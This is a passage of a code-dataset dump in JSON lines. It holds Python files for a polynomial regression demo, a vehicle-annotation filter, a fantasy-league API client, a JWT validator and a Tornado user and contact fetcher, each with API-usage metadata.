"line_number": 336, "usage_type": "call"}, {"api_name": "os.path", "line_number": 336, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 337, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 340, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 341, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 351, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 351, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 353, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 353, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 354, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 354, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 355, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 355, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 356, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 356, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 364, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 364, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 366, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 366, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 370, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 370, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}]} +{"seq_id": "347286778", "text": "import warnings\nwarnings.filterwarnings(\"ignore\")\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\n\n# Pandas read csv file\ndataset = pd.read_csv('G:/projects/mindfitai/datasets/position_salary.csv')\n# Define Features\nX = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, 2].values\n\n# Fitting Linear Regression to the dataset\nlr = LinearRegression()\nlr.fit(X, y)\n\n# Fitting Polynomial Regression to the dataset\npr = PolynomialFeatures(degree=4)\nX_pr = pr.fit_transform(X)\nlr_2 = LinearRegression()\nlr_2.fit(X_pr, y)\n\n# Visualising results\nplt.scatter(X, y, color=\"#f44336\")\nplt.plot(X, lr.predict(X), color=\"#8e24aa\", label=\"Linear Regression\")\nplt.plot(X, lr_2.predict(pr.fit_transform(X)), color=\"#29b6f6\", label=\"Polynomial Regression\")\nplt.xlabel(\"Position Level\")\nplt.ylabel(\"Salary\")\nplt.legend(loc=\"best\")\nplt.title(\"Difference between Linear Regression and Polynomial Regression predictions\")\nplt.show()\n\n# Testing\n# Polynomial Regression prediction salary by level (for HR in some company)\nprint(\"Enter feature employee level:\")\nx = input()\nprint('Predict salary from feature employee: {}'\n .format(lr_2.predict(pr.fit_transform(np.array([x]).reshape(1, -1))))\n)", "sub_path": "code/02-Part/polynomial_regression.py", "file_name": "polynomial_regression.py", "file_ext": "py", "file_size_in_byte": 1299, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 2, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "391688010", "text": "import json\nimport os\n\n# car_class = ['小轿车', '面包车', '货车', '小卡车', '大卡车', 'SUV', '客车', '公交车', '出租车', '垃圾车', '汽油罐车', '渣土车', '渣土车且小卡车', '工程车', '厢式卡车', '洒水车', '水泥罐车', '其他']\nother_car = ['小轿车', '面包车', '货车', '小卡车', '大卡车', 'SUV', '客车', '公交车', '出租车', '垃圾车', '汽油罐车', '工程车', '厢式卡车', '洒水车', '水泥罐车', '其他']\n\nroot = '/Users/yanyan/data/object_detection'\n\ncar_txt = open('other_car.txt', 'w')\nnumber = 0\n\nvideo_images = os.path.join(root, 'images')\nvideo_annos = os.path.join(root, 'annotations')\nvideo_per_annos = os.listdir(video_annos)\nfor anno_file in video_per_annos:\n if '.DS_Store' in anno_file:\n continue\n anno_path = os.path.join(video_annos, anno_file)\n\n with open(anno_path, 'r', encoding='utf8') as f:\n json_data = json.load(f)\n # 当前图像的路径信息\n img_path = '/'.join(json_data['data']['image_url'].split('/')[-2:])\n\n img_name = img_path.split('/')[1]\n img_infos = json_data['result']['data']\n\n bbox_number = len(img_infos)\n for index, img_info in enumerate(img_infos):\n bbox_label = img_info['label']\n bbox_category = img_info['category']\n category2label = {}\n for category, label in zip(bbox_category, bbox_label):\n category2label[category] = label\n\n if '渣土车' in str(category2label.get('车辆标注-车辆类型', None)) and category2label.get('车辆标注-渣土车是否苫盖', None) is not None:\n break\n elif str(category2label.get('车辆标注-车辆类型', None)) in other_car:\n if index == (bbox_number - 1):\n car_txt.write(f'object_detection/images/{img_name}' + '\\n')\n\n\n\n\n\n\n\n\n", "sub_path": "src/tools/data/提取除了渣土车的其他车类.py", "file_name": "提取除了渣土车的其他车类.py", "file_ext": "py", "file_size_in_byte": 1900, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "330871041", "text": "import requests\nimport json\nimport sys\nimport os.path\nlibdir = os.path.dirname(__file__)\nsys.path.append(os.path.split(libdir)[0])\n\nimport time\n\n\nclass mfl_api():\n def get_league_id_page(self):\n page = None\n try:\n page = requests.get(\n \"http://www03.myfantasyleague.com/2017/index?YEAR=2017&SEARCH=dynasty&submit=Go\")\n\n # check that page downloaded correctly\n if str(page.status_code)[0] != str(2):\n raise RuntimeError\n except:\n print(\"Error downloading MFL dynastly league id page.\")\n\n return page.content\n\n def get_league_trades(self, league_id, year=2018):\n # be nice to the servers\n time.sleep(1)\n\n trades_json = None\n try:\n trade_url = \"http://www55.myfantasyleague.com/\" + str(year) + \"/export?TYPE=transactions&L=\" \\\n + str(league_id) + \"&TRANS_TYPE=TRADE&JSON=1\"\n trade_page = requests.get(trade_url)\n if trade_page.status_code > 299 or trade_page.status_code < 200:\n raise RuntimeError\n\n # convert string to json, load trades\n trades_json = json.loads(trade_page.content.decode(\n 'utf-8'))['transactions']['transaction']\n\n # if only one trade from league, still return as list\n if type(trades_json) != list:\n trades_json = [trades_json]\n\n # convert ids to player names\n\n except Exception as e:\n print('Error downloading trades for league:',\n league_id, 'status code:', trade_page.status_code)\n print(e)\n return trades_json\n\n def get_basic_settings(self, league_id, year=2018):\n settings_url = \"http://www.myfantasyleague.com/\" + \\\n str(year) + \"/export?TYPE=league&L=\" + \\\n str(league_id) + \"&APIKEY=&JSON=1\"\n\n try:\n settings_page = requests.get(settings_url)\n if settings_page.status_code > 299 or settings_page.status_code < 200:\n raise RuntimeError\n\n return json.loads(settings_page.content.decode('utf-8'))\n except Exception as e:\n print('unable to get settings for', league_id)\n print(e)\n\n def get_advanced_settings(self, league_id, year=2018):\n settings_url = 'http://www.myfantasyleague.com/' + \\\n str(year) + '/export?TYPE=rules&L=' + str(league_id) + '&JSON=1'\n try:\n settings_page = requests.get(settings_url)\n if settings_page.status_code > 299 or settings_page.status_code < 200:\n raise RuntimeError\n return json.loads(settings_page.content.decode('utf-8'))\n\n except Exception as e:\n print('unable to get settings for', league_id)\n print(e)\n\n def get_valid_leagues(self, fast_search=True):\n pass\n", "sub_path": "services/apis/mfl_api.py", "file_name": "mfl_api.py", "file_ext": "py", "file_size_in_byte": 2893, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 5, "usage_type": "name"}, {"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.path.split", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 6, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 60, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 64, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "93190279", "text": "from typing import Any, Dict, Optional, Tuple\nfrom urllib import parse\n\nimport jwt\n\nfrom .config import Environment\n\nfrom .constants import (\n ANONYMOUS_USER,\n COOKIE_NAME,\n HEADER_NAME,\n USER_ID_PROPERTY,\n)\nfrom .exceptions import (\n AuthenticateException,\n InvalidCredentialsException,\n InstanceError,\n)\nfrom .http_handler import HttpHandler\n\n\nclass Validator:\n \"\"\"\n The validator verifies a given ticket if it is valid.\n \"\"\"\n\n def __init__(self, http_handler: HttpHandler, debug_fn: Any = print) -> None:\n debug_fn(\"Validator.__init__\")\n self.http_handler = http_handler\n self.debug_fn = debug_fn\n self.environment = Environment(debug_fn)\n\n def verify(\n self, token_encoded: str, cookie_encoded: str\n ) -> Tuple[int, Optional[str]]:\n self.debug_fn(\"Validator.verify\")\n try:\n self.__assert_instance_of_encoded_jwt(token_encoded, \"Token\")\n self.__assert_instance_of_encoded_jwt(cookie_encoded, \"Cookie\")\n return self.__verify_ticket(token_encoded, cookie_encoded), None\n except jwt.exceptions.ExpiredSignatureError:\n return self.__verify_ticket_from_auth_service(token_encoded, cookie_encoded)\n except jwt.exceptions.InvalidSignatureError:\n raise InvalidCredentialsException(\"The signature of the jwt is invalid\")\n\n def __verify_ticket(self, token_encoded: str, cookie_encoded: str) -> int:\n self.debug_fn(\"Validator.__verify_ticket\")\n token_encoded = self.__get_jwt_from_bearer_jwt(token_encoded, \"token\")\n cookie_encoded = self.__get_jwt_from_bearer_jwt(cookie_encoded, \"cookie\")\n # this may raise an ExpiredSignatureError. We check,\n # if the cookies signature is valid\n self.__decode(cookie_encoded, self.environment.get_cookie_key())\n token = self.__decode(token_encoded, self.environment.get_token_key())\n user_id = token.get(USER_ID_PROPERTY)\n if not isinstance(user_id, int):\n raise AuthenticateException(\"user_id is not an int\")\n return user_id\n\n def __assert_instance_of_encoded_jwt(self, jwt: str, name: str = \"jwt\") -> None:\n self.debug_fn(\"Validator.__assert_instance_of_encoded_jwt\")\n if not isinstance(jwt, str):\n error_message = f\"{jwt} is from type {type(jwt)} -- expected: string\"\n self.debug_fn(f\"Throw Error\\n{error_message}\")\n raise InstanceError(error_message)\n\n def __get_jwt_from_bearer_jwt(self, string: str, name: str = \"jwt\") -> str:\n self.debug_fn(\"Validator.__get_jwt_from_bearer_jwt\")\n if not self.__is_bearer(string):\n raise InvalidCredentialsException(f\"Wrong format of {name}: {string}\")\n return string[7:]\n\n def __decode(self, encoded_jwt: str, secret: str) -> Dict:\n self.debug_fn(\"Validator.__decode\")\n return jwt.decode(encoded_jwt, secret, algorithms=[\"HS256\"])\n\n def __is_bearer(self, encoded_jwt: str) -> bool:\n self.debug_fn(\"Validator.__is_bearer\")\n return len(encoded_jwt) >= 7 and encoded_jwt.startswith(\"bearer \")\n\n def __verify_ticket_from_auth_service(\n self, token_encoded: str, cookie_encoded: str\n ) -> Tuple[int, Optional[str]]:\n \"\"\"\n Sends a request to the auth-service configured in the constructor.\n \"\"\"\n self.debug_fn(\"Validator.__verify_ticket_from_auth_service\")\n headers = {HEADER_NAME: token_encoded}\n cookies = {COOKIE_NAME: cookie_encoded}\n response = self.http_handler.send_internal_request(\n \"/authenticate\", headers=headers, cookies=cookies\n )\n if not response.ok:\n self.debug_fn(\n \"Error from auth-service: \" + response.content.decode(\"utf-8\")\n )\n raise AuthenticateException(\n f\"Authentication service sends HTTP {response.status_code}. \"\n )\n\n user_id = self.__get_user_id_from_response_body(response.json())\n access_token = response.headers.get(HEADER_NAME, None)\n return user_id, access_token\n\n def __get_user_id_from_response_body(self, response_body) -> int:\n self.debug_fn(\"Validator.__get_user_id_from_response_body\")\n try:\n return response_body[USER_ID_PROPERTY]\n except (TypeError, KeyError) as e:\n raise AuthenticateException(\n f\"Empty or bad response from authentication service: {e}\"\n )\n", "sub_path": "auth/libraries/pip-auth/authlib/validator.py", "file_name": "validator.py", "file_ext": "py", "file_size_in_byte": 4479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "http_handler.HttpHandler", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 27, "usage_type": "name"}, {"api_name": "config.Environment", "line_number": 31, "usage_type": "call"}, {"api_name": "jwt.exceptions", "line_number": 41, "usage_type": "attribute"}, {"api_name": "jwt.exceptions", "line_number": 43, "usage_type": "attribute"}, {"api_name": "exceptions.InvalidCredentialsException", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 35, "usage_type": "name"}, {"api_name": "constants.USER_ID_PROPERTY", "line_number": 54, "usage_type": "argument"}, {"api_name": "exceptions.AuthenticateException", "line_number": 56, "usage_type": "call"}, {"api_name": "exceptions.InstanceError", "line_number": 64, "usage_type": "call"}, {"api_name": "exceptions.InvalidCredentialsException", "line_number": 69, "usage_type": "call"}, {"api_name": "jwt.decode", "line_number": 74, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 72, "usage_type": "name"}, {"api_name": "constants.HEADER_NAME", "line_number": 87, "usage_type": "name"}, {"api_name": "constants.COOKIE_NAME", "line_number": 88, "usage_type": "name"}, {"api_name": "exceptions.AuthenticateException", "line_number": 96, "usage_type": "call"}, {"api_name": "constants.HEADER_NAME", "line_number": 101, "usage_type": "argument"}, {"api_name": "typing.Tuple", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 82, "usage_type": "name"}, {"api_name": "constants.USER_ID_PROPERTY", "line_number": 107, "usage_type": "name"}, {"api_name": "exceptions.AuthenticateException", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "598176230", "text": "import tornado.web\nimport tornado.httpclient\nimport logging\nimport json\nimport base64\n\nimport motor\n\nfrom mickey.commonconf import REDIS_CONTACT_PREFIX, REDIS_AUTH_PREFIX, REDIS_DOMAINKEY_PREFIX\nimport mickey.users\nimport mickey.redis\n\n_logger = logging.getLogger(__name__)\n_api_ver = \"v1\"\n\n_requrest_headers = {\n \"Content-type\" : \"application/json; charset=utf-8\"\n}\n\n\n@tornado.gen.coroutine\ndef getuser(token, provison = False):\n user = None\n userid = None\n\n #decode token\n token_key = \"\"\n try:\n decode_token = base64.b64decode(token[6:])\n strs_list = str(decode_token, encoding = \"utf-8\").split(':')\n if not strs_list:\n return (None, 498)\n\n token_key = strs_list[0]\n except Exception as e:\n _logger.error(\"decode token failed {0}\".format(e))\n return (None, 498)\n\n userid = mickey.redis.read_from_redis(REDIS_AUTH_PREFIX + token_key)\n\n if not userid: \n httpclient = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/security/persons/00000000000\"\n ath_headers = {\n \"Authorization\" : token\n }\n\n res_body = {}\n try:\n response = yield httpclient.fetch(url, None, method = \"GET\", headers = ath_headers, body = None, follow_redirects = True)\n if response.code != 200:\n _logger.error(\"get userinfo %d received session = %s\" % (response.code, token))\n return (userid, response.code)\n\n res_body = json.loads(response.body.decode(\"utf-8\"))\n except Exception as e:\n _logger.error(\"get user info failed {0}\".format(e))\n if e.response:\n return (userid, e.response.code)\n else:\n return (userid, 599)\n\n userid = str(res_body.get(\"userID\", \"\"))\n\n if not userid:\n _logger.error(\"get userid failed session = %s\" % token)\n return (userid, 500)\n\n _logger.info(\"get user id success token = %s id = %s domain = %s\" % (token, userid, domain))\n #cach token\n mickey.redis.write_to_redis(REDIS_AUTH_PREFIX + token_key, userid, 3600)\n \n #do the local provision\n #yield mickey.users.local_provision(userid, token)\n\n if provison:\n _logger.info(\"begin to provision %s with token %s\" % (userid, token))\n yield mickey.users.local_provision(userid, token)\n yield mickey.users.refresh_logintime_of_contact(userid)\n \n return (userid, 200) \n\n@tornado.gen.coroutine\ndef getcontact(contactid, token = None, forcedb = False):\n redis_contact_key = REDIS_CONTACT_PREFIX + contactid\n contact_info = None\n unpack_contact_info = {}\n\n if not contactid:\n return unpack_contact_info\n\n #read contact from redis first\n if forcedb:\n mickey.redis.remove_from_redis(redis_contact_key)\n else:\n contact_info = mickey.redis.read_from_redis(redis_contact_key)\n\n if contact_info:\n try:\n unpack_contact_info = json.loads(contact_info)\n return unpack_contact_info\n except Exception as e:\n _logger.error(\"unpack contact failed {0}\".format(e))\n\n #read contact from http\n httpclient = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/security/contacts/%s\" % contactid\n\n try:\n response = yield httpclient.fetch(url, None, method = \"GET\", headers = None, body = None)\n if response.code != 200:\n _logger.error(\"get contactinfo failed userid = %s\" % contactid)\n return unpack_contact_info\n unpack_contact_info = json.loads(response.body.decode(\"utf-8\"))\n except Exception as e:\n _logger.error(\"get userinfo failed {0}\".format(e))\n\n #cache the contact information\n if unpack_contact_info:\n dump_contact = json.dumps(unpack_contact_info)\n mickey.redis.write_to_redis(redis_contact_key, dump_contact)\n\n return unpack_contact_info\n\n@tornado.gen.coroutine\ndef getdomain(contactid):\n redis_domian_key = REDIS_DOMAINKEY_PREFIX + contactid\n domain_info = None\n if not contactid:\n return domain_info\n\n domain_info = mickey.redis.read_from_redis(redis_domian_key)\n if domain_info:\n return domain_info\n\n httpclient = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/security/contacts/%s\" % contactid\n \n try:\n response = yield httpclient.fetch(url, None, method = \"GET\", headers = None, body = None)\n if response.code != 200:\n _logger.error(\"get domaininfo failed userid = %s\" % contactid)\n return domain_info\n unpack_contact_info = json.loads(response.body.decode(\"utf-8\"))\n domain_info = unpack_contact_info.get(\"domain\", \"\")\n _logger.info(\"getdomain success user %s domain %s\" % (contactid, domain_info))\n mickey.redis.write_to_redis(redis_domian_key, domain_info)\n except Exception as e:\n _logger.error(\"get domaininfo failed {0}\".format(e))\n\n return domain_info\n\ndef getdomain_redis(contactid):\n redis_domian_key = REDIS_DOMAINKEY_PREFIX + contactid\n domain_info = None\n if not contactid:\n return domain_info\n\n domain_info = mickey.redis.read_from_redis(redis_domian_key)\n if domain_info:\n return domain_info\n\n return None\n\ndef remove_users_from_conf(groupid, users):\n http_client = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/confs2/%s/groupdelmember\" % groupid\n \n ath_headers = {\n \"Content-Type\" : \"application/json\"\n }\n\n str_body = json.dumps(users)\n try:\n http_client.fetch(url, None, method='POST', headers=ath_headers, body=str_body)\n except Exception as e:\n _logger.error(\"remove user failed {0}\".format(e))\n\ndef remove_conference(groupid):\n http_client = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/confs2/%s/groupDel\" % groupid\n \n try:\n http_client.fetch(url, None, method='DELETE', headers=None, body=None)\n except Exception as e:\n _logger.error(\"remove conference failed {0}\".format(e))\n\n@tornado.gen.coroutine\ndef bindboxtouser(userid, deviceid, role):\n _logger.info(\"bind user %s to device %s as %s\" % (userid, deviceid, role)) \n\n if not userid or not deviceid or not role:\n _logger.error(\"invalid parameter\")\n return 403\n\n http_client = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/%s/security/devicemap/operations/post\" % _api_ver\n\n input_para = {\n \"userID\":userid,\n \"deviceID\": deviceid,\n \"role\":role\n }\n\n request_body = json.dumps(input_para)\n\n try:\n response = yield http_client.fetch(url, None, method = \"POST\", headers = _requrest_headers, body = request_body)\n if response.code < 200 or response.code > 299:\n _logger.error(\"bind user %s to device %s as %s failed %s\" % (userid, deviceid, role, response.code))\n return response.code\n except Exception as e:\n _logger.error(\"bind user to device failed {0}\".format(e))\n return 500\n\n return 200\n\n@tornado.gen.coroutine\ndef removebind(userid, deviceid, role):\n _logger.info(\"remove bind user %s to device %s as %s\" % (userid, deviceid, role))\n\n if not userid or not deviceid or not role:\n _logger.error(\"invalid parameter\")\n return 403\n\n http_client = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/%s/security/devicemap/operations/delete\" % _api_ver\n\n input_para = {\n \"userID\":userid,\n \"deviceID\":deviceid,\n \"role\":role\n }\n\n request_body = json.dumps(input_para)\n\n try:\n response = yield http_client.fetch(url, None, method = \"POST\", headers = _requrest_headers, body = request_body)\n if response.code < 200 or response.code > 299:\n _logger.error(\"remove bind user %s to device %s as %s failed %s\" % (userid, deviceid, role, response.code))\n return response.code\n except Exception as e:\n _logger.error(\"remove bind user to device failed {0}\".format(e))\n return 500\n\n return 200\n\n@tornado.gen.coroutine\ndef transferbind(userid, deviceid, role, new_userid):\n _logger.info(\"transfer user %s device %s role %s to %s\" % (userid, deviceid, role, new_userid))\n\n if not userid or not deviceid or not role or not new_userid:\n _logger.error(\"invalid parameter\")\n return 403\n\n http_client = tornado.httpclient.AsyncHTTPClient()\n url = \"http://localhost:8083/cxf/%s/security/devicemap/operations/put\" % _api_ver\n\n input_para = {\n \"userID\":userid,\n \"deviceID\":deviceid,\n \"role\":role,\n \"newUserID\": new_userid\n }\n\n request_body = json.dumps(input_para)\n\n try:\n response = yield http_client.fetch(url, None, method = \"POST\", headers = _requrest_headers, body = request_body)\n if response.code < 200 or response.code > 299:\n _logger.error(\"transfer user %s device %s role %s to %s failed %s\" % (userid, deviceid, role, new_userid, response.code))\n return response.code\n except Exception as e:\n _logger.error(\"remove bind user to device failed {0}\".format(e))\n return 500\n\n return 200\n\n", "sub_path": "libs/mickey/userfetcher.py", "file_name": "userfetcher.py", "file_ext": "py", "file_size_in_byte": 9264, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 29, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis.read_from_redis", "line_number": 39, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 39, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 39, "usage_type": "name"}, {"api_name": "mickey.commonconf.REDIS_AUTH_PREFIX", "line_number": 39, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 42, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 42, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 55, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis.write_to_redis", "line_number": 71, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 71, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 71, "usage_type": "name"}, {"api_name": "mickey.commonconf.REDIS_AUTH_PREFIX", "line_number": 71, "usage_type": "name"}, {"api_name": "mickey.commonconf.users.local_provision", "line_number": 78, "usage_type": "call"}, {"api_name": "mickey.commonconf.users", "line_number": 78, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 78, "usage_type": "name"}, {"api_name": "mickey.commonconf.users.refresh_logintime_of_contact", "line_number": 79, "usage_type": "call"}, {"api_name": "mickey.commonconf.users", "line_number": 79, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 79, "usage_type": "name"}, {"api_name": "tornado.web.gen", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 21, "usage_type": "name"}, {"api_name": "mickey.commonconf.REDIS_CONTACT_PREFIX", "line_number": 85, "usage_type": "name"}, {"api_name": "mickey.commonconf.redis.remove_from_redis", "line_number": 94, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 94, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 94, "usage_type": "name"}, {"api_name": "mickey.commonconf.redis.read_from_redis", "line_number": 96, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 96, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 96, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 100, "usage_type": "call"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 106, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 106, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 106, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 114, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 120, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis.write_to_redis", "line_number": 121, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 121, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 121, "usage_type": "name"}, {"api_name": "tornado.web.gen", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 83, "usage_type": "name"}, {"api_name": "mickey.commonconf.REDIS_DOMAINKEY_PREFIX", "line_number": 127, "usage_type": "name"}, {"api_name": "mickey.commonconf.redis.read_from_redis", "line_number": 132, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 132, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 132, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 136, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 136, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 136, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 144, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis.write_to_redis", "line_number": 147, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 147, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 147, "usage_type": "name"}, {"api_name": "tornado.web.gen", "line_number": 125, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 125, "usage_type": "name"}, {"api_name": "mickey.commonconf.REDIS_DOMAINKEY_PREFIX", "line_number": 154, "usage_type": "name"}, {"api_name": "mickey.commonconf.redis.read_from_redis", "line_number": 159, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 159, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 159, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 166, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 166, "usage_type": 